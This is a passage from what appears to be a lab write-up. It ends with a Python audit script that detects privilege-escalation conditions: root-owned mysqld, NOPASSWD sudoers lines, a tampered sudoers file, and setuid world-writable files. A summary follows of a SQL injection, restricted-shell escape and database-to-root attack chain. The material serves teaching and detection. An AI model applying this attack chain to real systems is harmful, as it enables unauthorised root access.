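root      4461  0.0  3.3 127224 17304 ?        Sl   15:20   0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root
john      4911  0.0  0.1   3004   756 pts/0    R+   16:43   0:00 grep mysql
"""

# Constructed from the sudoers file as edited in the post (comments trimmed).
SUDOERS_SAMPLE = """\
Defaults        env_reset
root    ALL=(ALL) ALL
john    ALL=NOPASSWD :ALL
# %sudo ALL=NOPASSWD: ALL
%admin ALL=(ALL) ALL
"""

MYSQLD_RE = re.compile(r"(^|/)mysqld(\s|$)")   # the server itself, not the mysqld_safe wrapper
NOPASSWD_RE = re.compile(r"\bNOPASSWD\s*:")


def mysqld_as_root(ps_text):
    """Command lines of mysqld server processes owned by root in a `ps aux` listing."""
    hits = []
    for line in ps_text.splitlines():
        fields = line.split(None, 10)          # USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        if len(fields) < 11:
            continue
        user, cmd = fields[0], fields[10]
        if user == "root" and MYSQLD_RE.search(cmd):
            hits.append(cmd)
    return hits


def nopasswd_entries(sudoers_text):
    """Active (uncommented) sudoers lines that grant NOPASSWD."""
    stripped = (raw.strip() for raw in sudoers_text.splitlines())
    return [s for s in stripped if s and not s.startswith("#") and NOPASSWD_RE.search(s)]


def sudoers_mode_ok(mode, uid, gid):
    """sudo expects /etc/sudoers owned by root:root with mode 0440 (mode may include file-type bits)."""
    return uid == 0 and gid == 0 and (mode & 0o7777) == 0o440


def setuid_world_writable(mode):
    """A setuid file that anyone can write hands root to whoever writes it last."""
    return bool(mode & 0o4000) and bool(mode & 0o002)


def audit(ps_text, sudoers_text, sudoers_stat, setuid_files=()):
    """Return a list of findings (empty means none of the conditions were seen).

    sudoers_stat is (mode, uid, gid) for /etc/sudoers; setuid_files is an iterable
    of (path, mode) pairs, e.g. from a find over setuid files."""
    findings = []
    for cmd in mysqld_as_root(ps_text):
        findings.append("mysqld runs as root: %s" % cmd)
    for entry in nopasswd_entries(sudoers_text):
        findings.append("NOPASSWD sudoers entry: %s" % entry)
    mode, uid, gid = sudoers_stat
    if not sudoers_mode_ok(mode, uid, gid):
        findings.append("sudoers not root:root 0440 (uid=%d gid=%d mode=%o)" % (uid, gid, mode & 0o7777))
    for path, fmode in setuid_files:
        if setuid_world_writable(fmode):
            findings.append("setuid and world-writable: %s (mode %o)" % (path, fmode & 0o7777))
    return findings


if __name__ == "__main__":
    # State of the box after the steps in the post: sudoers chown'ed to john (assumed uid/gid 1000)
    # and chmod 777, and /tmp/exploit given `chmod +s,a+rwx`.
    for finding in audit(PS_SAMPLE, SUDOERS_SAMPLE, (0o777, 1000, 1000), [("/tmp/exploit", 0o6777)]):
        print(finding)
```

The regex deliberately matches only the mysqld server and not mysqld_safe, because the wrapper normally runs as root and drops to the configured user; the server process itself owned by root (here with an explicit --user=root) is the finding. Running the service as a dedicated mysql user removes the sys_exec path entirely, and the sudoers ownership and mode check catches the tampering even after the NOPASSWD line is added.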

Summary

SQL injection through the login form.

After obtaining the credentials, log in over SSH with the ssh-dss host key algorithm re-enabled.

Escape the restricted shell and escalate to root through the root-privileged database.

I also tried using ssh_login in Metasploit to log in and get a session back, then do UDF privilege escalation, but this SSH key algorithm is not supported by that module. So I wanted to try a reverse shell instead, but bash couldn't spawn one. If any of you know why, give me a kick.
